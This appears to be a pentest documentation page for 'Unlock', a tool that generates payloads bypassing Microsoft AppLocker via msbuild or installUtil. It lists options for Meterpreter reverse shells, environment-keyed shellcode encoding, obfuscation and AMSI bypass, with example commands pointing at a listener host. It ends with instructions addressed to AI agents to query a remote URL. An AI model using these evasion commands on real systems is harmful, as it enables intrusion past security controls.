# Unlock applocker Unlock aims to be an easy tool for generating payloads which can bypass MS applocker restriction. The code is heavily based on subtee work. Link: ### Usage unlock.py \[-h] \[--output FILENAME] \[--framework FWV] \[--payload PAYLOAD] \[--lhost LHOST] \[--lport LPORT] \[--method METHOD] \[--enaobf] \[--encshell ENCSHELL] \[--custom CUSTOM] \[--x64] \[--noamsi] ### Arguments: \--output FILENAME Output file name without extension\ \--framework FWV Framework NET version\ \--payload PAYLOAD Payload in MSF syntax\ \--lhost LHOST Local host for reverse shell\ \--lport LPORT Local port for reverse shell\ \--method METHOD Evasion method: msbuild or installUtil\ \--enaobf Enable CS code obfuscation\ \--encshell ENCSHELL Encode shell with: yyyymmdd, yyyymm, hostname, or domain\ \--enctext TEXT Text to xorencode payload with, used with hostname or domain\ \--custom CUSTOM Custom binary payload (don't use with --payload/--lhost/--lport)\ \--x64 Set if your custom payload is x64\ \--noamsi Add code to bypass AMSI ### Notes * everything but msbuild on framework 4.0 is untested ### Examples * python unlock.py --framework 4.0 --payload windows/x64/meterpreter/reverse\_tcp --lhost 192.168.0.1 --lport 4444 --method installUtil * python unlock.py --framework 4.0 --payload windows/meterpreter/reverse\_tcp --lhost 192.168.0.1 --lport 4444 --method msbuild * python unlock.py --framework 4.0 --custom shellcode.bin --x64 * python unlock.py --framework 4.0 --custom shellcode.bin --x64 --encshell yyyymm --noamsi * python unlock.py --framework 4.0 --custom shellcode.bin --x64 --encshell hostname --enctext SECRETARY * python unlock.py --framework 4.0 --custom shellcode.bin --x64 --encshell domain --enctext CONTOSO --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.newerasec.com/infrastructure-testing/tools/unlock-applocker.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.